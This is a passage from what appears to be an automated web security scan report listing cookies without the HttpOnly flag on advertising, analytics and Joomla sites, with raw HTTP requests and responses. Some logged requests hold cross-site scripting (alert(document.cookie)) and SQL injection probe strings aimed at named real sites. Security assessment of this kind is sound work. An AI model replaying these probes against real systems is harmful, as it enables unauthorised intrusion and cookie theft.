<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.254. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1596198292@x23

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
  • NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2584
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<!-- aol -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395" width = "1" height = "1" border = "0">
<img src="http://at.amgdgt.
...[SNIP]...

14.255. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/11596989115@x92

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/11596989115@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1549
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

14.256. http://dm.de.mookie1.com/2/B3DM/DLX/@x94

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 915
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<script>
var oas_d=new Date();
var oas_m=oas_d.getTime();

oas_d.setTime(oas_m+86400000);
document.cookie="dlx_20100929=set;expires="+oas_d.toGMTString()+";path=/;domain=.mookie1.com";

oas_d.s
...[SNIP]...

14.257. http://dominionenterprises.112.2o7.net/b/ss/deparenthood/1/H.15.1/s24211537942755

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /b/ss/deparenthood/1/H.15.1/s24211537942755

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • s_vi=[CS]v1|269F1A080515A595-600001A8000031B7[CE]; Expires=Sun, 24 Jan 2016 02:23:12 GMT; Domain=dominionenterprises.112.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/deparenthood/1/H.15.1/s24211537942755?[AQB]&ndh=1&t=24/0/2011%2020%3A23%3A13%201%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&g=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&r=http%3A//burp/show/57&cc=USD&ch=www.parenthood.com&events=event1&c1=Data%20Not%20Available&v1=Data%20Not%20Available&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&v4=First%20page%20view%20or%20cookies%20not%20supported&v5=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: dominionenterprises.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 02:23:12 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269F1A080515A595-600001A8000031B7[CE]; Expires=Sun, 24 Jan 2016 02:23:12 GMT; Domain=dominionenterprises.112.2o7.net; Path=/
Location: http://dominionenterprises.112.2o7.net/b/ss/deparenthood/1/H.15.1/s24211537942755?AQB=1&pccr=true&vidn=269F1A080515A595-600001A8000031B7&&ndh=1&t=24/0/2011%2020%3A23%3A13%201%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&g=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&r=http%3A//burp/show/57&cc=USD&ch=www.parenthood.com&events=event1&c1=Data%20Not%20Available&v1=Data%20Not%20Available&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&v4=First%20page%20view%20or%20cookies%20not%20supported&v5=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Mon, 24 Jan 2011 02:23:12 GMT
Last-Modified: Wed, 26 Jan 2011 02:23:12 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 0
Content-Type: text/plain


14.258. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.21/s27710598513465

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /b/ss/desoundings/1/H.21/s27710598513465

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • s_vi=[CS]v1|269F1B3305160AA7-600001A2A004A9AA[CE]; Expires=Sun, 24 Jan 2016 02:33:10 GMT; Domain=dominionenterprises.112.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/desoundings/1/H.21/s27710598513465?AQB=1&ndh=1&t=24/0/2011%2020%3A33%3A10%201%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Buying%20a%20Boat%3F%20Search%20on%20Soundingsonline.com&g=http%3A//www.soundingsonline.com/index.php%3Foption%3Dcom_content%26view%3Dcategory%26layout%3Dblog%26id%3D%27%252B%2520%28select%2Bconvert%28int%2CCHAR%2895%29%252BCHAR%2833%29%252BCHAR%2864%29%252BCHAR%2850%29%252BCHAR%28100%29%252BCHAR%28105%29%252BCHAR%28108%29%252BCHAR%28101%29%252BCHAR%28109%29%252BCHAR%28109%29%252BCHAR%2897%29%29%2BFROM%2Bsyscolum&cc=USD&ch=www.soundingsonline.com&events=event1%2Cevent2&c1=D%3Dg&v1=D%3Dg&c2=1&v2=1&c3=monday%7C9%3A30pm&v3=monday%7C9%3A30pm&c4=New&v4=New&c5=First%20Visit&v5=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1192&bh=688&ct=lan&hp=N&AQE=1 HTTP/1.1
Accept: */*
Referer: http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: dominionenterprises.112.2o7.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 02:33:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269F1B3305160AA7-600001A2A004A9AA[CE]; Expires=Sun, 24 Jan 2016 02:33:10 GMT; Domain=dominionenterprises.112.2o7.net; Path=/
Location: http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.21/s27710598513465?AQB=1&pccr=true&vidn=269F1B3305160AA7-600001A2A004A9AA&&ndh=1&t=24/0/2011%2020%3A33%3A10%201%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Buying%20a%20Boat%3F%20Search%20on%20Soundingsonline.com&g=http%3A//www.soundingsonline.com/index.php%3Foption%3Dcom_content%26view%3Dcategory%26layout%3Dblog%26id%3D%27%252B%2520%28select%2Bconvert%28int%2CCHAR%2895%29%252BCHAR%2833%29%252BCHAR%2864%29%252BCHAR%2850%29%252BCHAR%28100%29%252BCHAR%28105%29%252BCHAR%28108%29%252BCHAR%28101%29%252BCHAR%28109%29%252BCHAR%28109%29%252BCHAR%2897%29%29%2BFROM%2Bsyscolum&cc=USD&ch=www.soundingsonline.com&events=event1%2Cevent2&c1=D%3Dg&v1=D%3Dg&c2=1&v2=1&c3=monday%7C9%3A30pm&v3=monday%7C9%3A30pm&c4=New&v4=New&c5=First%20Visit&v5=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1192&bh=688&ct=lan&hp=N&AQE=1
X-C: ms-4.3.1
Expires: Mon, 24 Jan 2011 02:33:10 GMT
Last-Modified: Wed, 26 Jan 2011 02:33:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www621
Content-Length: 0
Content-Type: text/plain


14.259. http://dp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dp.specificclick.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • adp=780z^4^4095; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
  • ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
  • smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
  • adf=780z^0^0; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
  • ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?v=102&d=1&nwk=1&y=2&u=http%3A%2F%2Fwww.autobytel.com%2Fx22&r=http%3A%2F%2Fburp%2Fshow%2F31&rnd=989810 HTTP/1.1
Host: dp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=780z^4^4095; smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=780z^0^0; ug=uosDj9Liw_xRTA

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=780z^4^4095; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Set-Cookie: adf=780z^0^0; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html
Date: Mon, 24 Jan 2011 21:07:10 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 0


14.260. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.abbreviations.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 18:25:13 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.abbreviations.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F32&po6wxt HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 350
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 24 Jan 2011 21:08:42 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 23 Feb 2011 21:08:42 GMT; Path=/
Set-Cookie: di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; Domain=.addthis.com; Expires=Wed, 23-Jan-2013 18:25:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 24 Jan 2011 21:08:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:08:42 GMT
Connection: close

_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.abbreviations.com%2fbs.aspx%3fst%3db1.aspx51536%253Cscri
...[SNIP]...

14.261. http://extensions.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 3d56c873b463d3d3c1ccc249ca61c99d=9b5564d7b57848ef22bf9ac141472038; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=9b5564d7b57848ef22bf9ac141472038; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.262. http://extensions.joomla.org/extensions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 3d56c873b463d3d3c1ccc249ca61c99d=8ce91e96c30d6b3c03ce44895359f0bf; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extensions HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=8ce91e96c30d6b3c03ce44895359f0bf; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.263. http://extensions.joomla.org/extensions/advanced-search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/advanced-search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 3d56c873b463d3d3c1ccc249ca61c99d=662ff80b6519b113832192982b098a5a; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extensions/advanced-search HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=662ff80b6519b113832192982b098a5a; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.264. http://extensions.joomla.org/extensions/languages/translations-for-joomla

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/languages/translations-for-joomla

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 3d56c873b463d3d3c1ccc249ca61c99d=119690ae64f99e48cab89680209b4270; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extensions/languages/translations-for-joomla HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=119690ae64f99e48cab89680209b4270; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.265. http://extensions.joomla.org/extensions/new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/new

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 3d56c873b463d3d3c1ccc249ca61c99d=bd83a0d831a42c661eb59a60c147c8f6; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extensions/new HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=bd83a0d831a42c661eb59a60c147c8f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.266. http://flybase.org/reports/FBgn0000146.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flybase.org
Path:   /reports/FBgn0000146.html/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BALANCEID=balancer.chervil; path=/;
